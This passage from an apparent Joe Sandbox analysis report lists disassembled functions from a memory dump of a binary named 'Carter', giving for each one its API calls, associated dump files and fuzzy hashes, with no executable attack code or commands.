                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: CALL
                                                                        • API String ID: 0-4196123274
                                                                        • Opcode ID: 3adc8d8a693300eb9ff77ebc1fc9634e478deb1a26515ef9cd49f807e1fcff90
                                                                        • Instruction ID: e08bdd17fd60924e0e539470d19c20a87d0198bbd3c829800d3dbeb4e9703bdb
                                                                        • Opcode Fuzzy Hash: 3adc8d8a693300eb9ff77ebc1fc9634e478deb1a26515ef9cd49f807e1fcff90
                                                                        • Instruction Fuzzy Hash: 3E328970908385CFDB25DF15C480B6ABBE1BF94754F14896DE88A8B361D739EC41EB82
                                                                        Function 00FF48B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID: EA06
                                                                        • API String ID: 4104443479-3962188686
                                                                        • Opcode ID: 40ab430254c0d53777eab1fba947f95f4889e3987efe44ad178f5bee6af8f165
                                                                        • Instruction ID: 28856ff671de496b423398b3681361375e2fac6348df56bbbe77a03614250361
                                                                        • Opcode Fuzzy Hash: 40ab430254c0d53777eab1fba947f95f4889e3987efe44ad178f5bee6af8f165
                                                                        • Instruction Fuzzy Hash: 05418B22B0415C5BDF329F688C417BF7FA58F46310F2840B4FAC2EA2A6D565AD44A3E1
                                                                        Function 0105E139 Relevance: 3.2, APIs: 2, Instructions: 227COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _strcat.LIBCMT ref: 0105E20C
                                                                          • Part of subcall function 00FE4D37: __itow.LIBCMT ref: 00FE4D62
                                                                          • Part of subcall function 00FE4D37: __swprintf.LIBCMT ref: 00FE4DAC
                                                                        • _wcscpy.LIBCMT ref: 0105E29B
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: __itow__swprintf_strcat_wcscpy
                                                                        • String ID:
                                                                        • API String ID: 1012013722-0
                                                                        • Opcode ID: 927b5ad863e550abe07a4924ad1b625fc48457a71077311cddb9b92685b96a16
                                                                        • Instruction ID: 1afc1e38ee7a46e99e1969b0b90bac8f0a13d20ae230f8231a7e0625cb823289
                                                                        • Opcode Fuzzy Hash: 927b5ad863e550abe07a4924ad1b625fc48457a71077311cddb9b92685b96a16
                                                                        • Instruction Fuzzy Hash: 55913B35A00605DFDB59DF18C5859AEB7E5EF49314B55C09AEC8A8F3A2DB34EE01CB80
                                                                        Function 01046135 Relevance: 3.1, APIs: 2, Instructions: 142COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CharLowerBuffW.USER32(?,?), ref: 0104614E
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharLower
                                                                        • String ID:
                                                                        • API String ID: 2358735015-0
                                                                        • Opcode ID: b68886936f23dd163b9ae0a062a2699ec5bb7617080f2906ab50f110550f3725
                                                                        • Instruction ID: 178e13ec9b73321ecc3c6e6db8bf48e87939a7eaa38c8e91eecd7355a02eb880
                                                                        • Opcode Fuzzy Hash: b68886936f23dd163b9ae0a062a2699ec5bb7617080f2906ab50f110550f3725
                                                                        • Instruction Fuzzy Hash: 5B41D4F6A00209AFDB11DFA8C8C09AEB7F8FF55250B14457EE596D7251FB319A40CB50
                                                                        Function 01000E38 Relevance: 3.1, APIs: 2, Instructions: 94processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CloseHandle.KERNEL32 ref: 01000ED5
                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 01000EE7
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateHandleSnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 3280610774-0
                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                        • Instruction ID: 9c1614e962429b547c5875badef1e22814bb7805bf1121dbcdde5c5ddb0e754d
                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                        • Instruction Fuzzy Hash: 3531E870A00149DBE75ADF0CC480A6DFBA5FF49380F6486A5E549DB29AD731EDC1CB80
                                                                        Function 00FF5F8B Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • IsThemeActive.UXTHEME ref: 00FF5FEF
                                                                          • Part of subcall function 0100359C: __lock.LIBCMT ref: 010035A2
                                                                          • Part of subcall function 0100359C: DecodePointer.KERNEL32(00000001,?,00FF6004,01038892), ref: 010035AE
                                                                          • Part of subcall function 0100359C: EncodePointer.KERNEL32(?,?,00FF6004,01038892), ref: 010035B9
                                                                          • Part of subcall function 00FF5F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00FF5F18
                                                                          • Part of subcall function 00FF5F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00FF5F2D
                                                                          • Part of subcall function 00FF5240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FF526C
                                                                          • Part of subcall function 00FF5240: IsDebuggerPresent.KERNEL32 ref: 00FF527E
                                                                          • Part of subcall function 00FF5240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00FF52E6
                                                                          • Part of subcall function 00FF5240: SetCurrentDirectoryW.KERNEL32(?), ref: 00FF5366
                                                                        • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00FF602F
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                        • String ID:
                                                                        • API String ID: 1438897964-0
                                                                        • Opcode ID: 4d5e897a52c4a99193d2bb063bde62ed903c9b425f6d78780b2a97566f05b74f
                                                                        • Instruction ID: f168e270a43259676459f4e9dab01ce1edf32585e02202fb59eb2af2104649cc
                                                                        • Opcode Fuzzy Hash: 4d5e897a52c4a99193d2bb063bde62ed903c9b425f6d78780b2a97566f05b74f
                                                                        • Instruction Fuzzy Hash: 3511CD718087059BC320DF69EC4595ABBE8FF98710F40861FF184872A5DB7A9544CB92
                                                                        Function 00FF42F9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00FF3E72,?,?,?,00000000), ref: 00FF4327
                                                                        • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00FF3E72,?,?,?,00000000), ref: 01030717
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 8ecd9414feb24e255fea3a6dea8b91ac0344dd23e41b6e156ab9667a1abc4d9f
                                                                        • Instruction ID: 7a7aa58965969309ff234206946082610e02c9cead57a6f6be0b043f9bc67609
                                                                        • Opcode Fuzzy Hash: 8ecd9414feb24e255fea3a6dea8b91ac0344dd23e41b6e156ab9667a1abc4d9f
                                                                        • Instruction Fuzzy Hash: 1A01847118420DBEF3610E188C86F777A9CAF05768F10C315BBD46A1E0C6B56C45AB14
                                                                        Function 01000FE6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0100593C: __FF_MSGBANNER.LIBCMT ref: 01005953
                                                                          • Part of subcall function 0100593C: __NMSG_WRITE.LIBCMT ref: 0100595A
                                                                          • Part of subcall function 0100593C: RtlAllocateHeap.NTDLL(011E0000,00000000,00000001,?,00000004,?,?,01001003,?), ref: 0100597F
                                                                        • std::exception::exception.LIBCMT ref: 0100101C
                                                                        • __CxxThrowException@8.LIBCMT ref: 01001031
                                                                          • Part of subcall function 010087CB: RaiseException.KERNEL32(?,?,?,0109CAF8,?,?,?,?,?,01001036,?,0109CAF8,?,00000001), ref: 01008820
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 3902256705-0
                                                                        • Opcode ID: 392f36cea472a6354efb768198f099e56c86d194524bca3a91368fdfd3487722
                                                                        • Instruction ID: 138ce2b292029d8398737c23c4047b5391d2ef193794b971d8c0c3ec7d142c78
                                                                        • Opcode Fuzzy Hash: 392f36cea472a6354efb768198f099e56c86d194524bca3a91368fdfd3487722
                                                                        • Instruction Fuzzy Hash: 95F0F930A0420EA6FB26FA58EC11AEE7B9CBF11350F00405AF9C4962D0DB71CA40D695
                                                                        Function 0100581D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: __lock_file_memset
                                                                        • String ID:
                                                                        • API String ID: 26237723-0
                                                                        • Opcode ID: d13c4473a831e14e668b7cb7e4e8fcf31a646d9ba07e14bd6ae90e61aeedac61
                                                                        • Instruction ID: 2bc7456634199dda36edd81bf6dfaf0a574220aaf2b2ed3146349eafaaefcba5
                                                                        • Opcode Fuzzy Hash: d13c4473a831e14e668b7cb7e4e8fcf31a646d9ba07e14bd6ae90e61aeedac61
                                                                        • Instruction Fuzzy Hash: D3012571C0064AEBEF13AF698C049DE7BA1BF90360F148156A9946B1E0D7318751DF51
                                                                        Function 010055C6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 01008D58: __getptd_noexit.LIBCMT ref: 01008D58
                                                                        • __lock_file.LIBCMT ref: 0100560B
                                                                          • Part of subcall function 01006E3E: __lock.LIBCMT ref: 01006E61
                                                                        • __fclose_nolock.LIBCMT ref: 01005616
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                        • String ID:
                                                                        • API String ID: 2800547568-0
                                                                        • Opcode ID: 99293f0e7dc91dc9da79a360ca311f03379e961ccaab5a362492fce2892c455c
                                                                        • Instruction ID: 0350591f8287ec2aff18ba918ea8bd418b3ca6c05718bf333dc500406b6157b1
                                                                        • Opcode Fuzzy Hash: 99293f0e7dc91dc9da79a360ca311f03379e961ccaab5a362492fce2892c455c
                                                                        • Instruction Fuzzy Hash: 7EF09071C01B069AF7237B798C107AE7BE16F60331F11825A94E4EB1D0CB7C4A019F51
                                                                        Function 00FEE36D Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: SleepTimetime
                                                                        • String ID:
                                                                        • API String ID: 346578373-0
                                                                        • Opcode ID: 63f480374799ea651f59d01610a14dd6b31462a2c9d5cd84a0e525ba254345db
                                                                        • Instruction ID: 5633dba435e9ab64d4e4defcd1d4211cfd39cbcdab3abe1df5f50439d7638757
                                                                        • Opcode Fuzzy Hash: 63f480374799ea651f59d01610a14dd6b31462a2c9d5cd84a0e525ba254345db
                                                                        • Instruction Fuzzy Hash: 58F08C316406129FC360EF6AE849B66BBE8FF49760F000129F86AC7391DB70AC00DB91
                                                                        Function 01005E80 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __lock_file.LIBCMT ref: 01005EB4
                                                                        • __ftell_nolock.LIBCMT ref: 01005EBF
                                                                          • Part of subcall function 01008D58: __getptd_noexit.LIBCMT ref: 01008D58
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                        • String ID:
                                                                        • API String ID: 2999321469-0
                                                                        • Opcode ID: ae2be41612b8d2a8d8a61d914e9b4ac5ae7c2bcd03be419d28288d42a62e62e9
                                                                        • Instruction ID: 66f6aa18b7ae40b9b1aba4b931bc4396410edee658388faf3602eb067a00e328
                                                                        • Opcode Fuzzy Hash: ae2be41612b8d2a8d8a61d914e9b4ac5ae7c2bcd03be419d28288d42a62e62e9
                                                                        • Instruction Fuzzy Hash: 23F0A071D1165A9AFB13BB788D017EE76A07F61331F11820B90E0AB1D0CF788E429F51
                                                                        Function 00FF5AC3 Relevance: 3.0, APIs: 2, Instructions: 25windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00FF5AEF
                                                                        • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00FF5B1F
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: IconNotifyShell__memset
                                                                        • String ID:
                                                                        • API String ID: 928536360-0
                                                                        • Opcode ID: 2266c483224c8494f0f4f341b02bc7b701b0d5960d0183929d76fd882dbbd632
                                                                        • Instruction ID: e04b5999cb0a0dd0ccc0ebf4381e571f6f50316ab1da673281a2cbc2f51d83db
                                                                        • Opcode Fuzzy Hash: 2266c483224c8494f0f4f341b02bc7b701b0d5960d0183929d76fd882dbbd632
                                                                        • Instruction Fuzzy Hash: D0F082719043089FD7A38B2498457A577BC9701308F0001E9AA8896289DB774B88CB51
                                                                        Function 0105C355 Relevance: 1.8, APIs: 1, Instructions: 288COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: LoadString$__swprintf
                                                                        • String ID:
                                                                        • API String ID: 207118244-0
                                                                        • Opcode ID: 549db3bf94e36e6dc9c4d15491b77f3e5772b5d87454884969afc212e9e1b539
                                                                        • Instruction ID: bf85602614e573a2dd9f1df689e79fe24625b4c8ec2d710a0c51842e313a6742
                                                                        • Opcode Fuzzy Hash: 549db3bf94e36e6dc9c4d15491b77f3e5772b5d87454884969afc212e9e1b539
                                                                        • Instruction Fuzzy Hash: 1BB16075A0020ADFDB54EF98C880DFEBBB9FF48710F14815AF955A7291DB34AA41CB90
                                                                        Function 00FEA820 Relevance: 1.7, APIs: 1, Instructions: 193COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c36f77044348828147aa364c2673c521f5977255d55e477ca21e101818d50377
                                                                        • Instruction ID: fb7d10c33a9326c939d92fb7d6f515986a66ded62313399ade07038702e72534
                                                                        • Opcode Fuzzy Hash: c36f77044348828147aa364c2673c521f5977255d55e477ca21e101818d50377
                                                                        • Instruction Fuzzy Hash: D261A871A002869FDB10EF65C880BBEB7E5EF44310F11806DE9568B292E774FD81EB52
                                                                        Function 00FED679 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e262b7764506d2459232e128ca873ab004b9a542bf418da1c067d03444ee3771
                                                                        • Instruction ID: 91cb6f82a73f1a5d4b941c8b8de0b098ed65c3b2955cbbe8dbd2830dbddbc43e
                                                                        • Opcode Fuzzy Hash: e262b7764506d2459232e128ca873ab004b9a542bf418da1c067d03444ee3771
                                                                        • Instruction Fuzzy Hash: D951B2357002199BDB15EF68CD91FBE77A6AF85310F1440A8F946AB392CB34ED01EB44
                                                                        Function 00FF343F Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
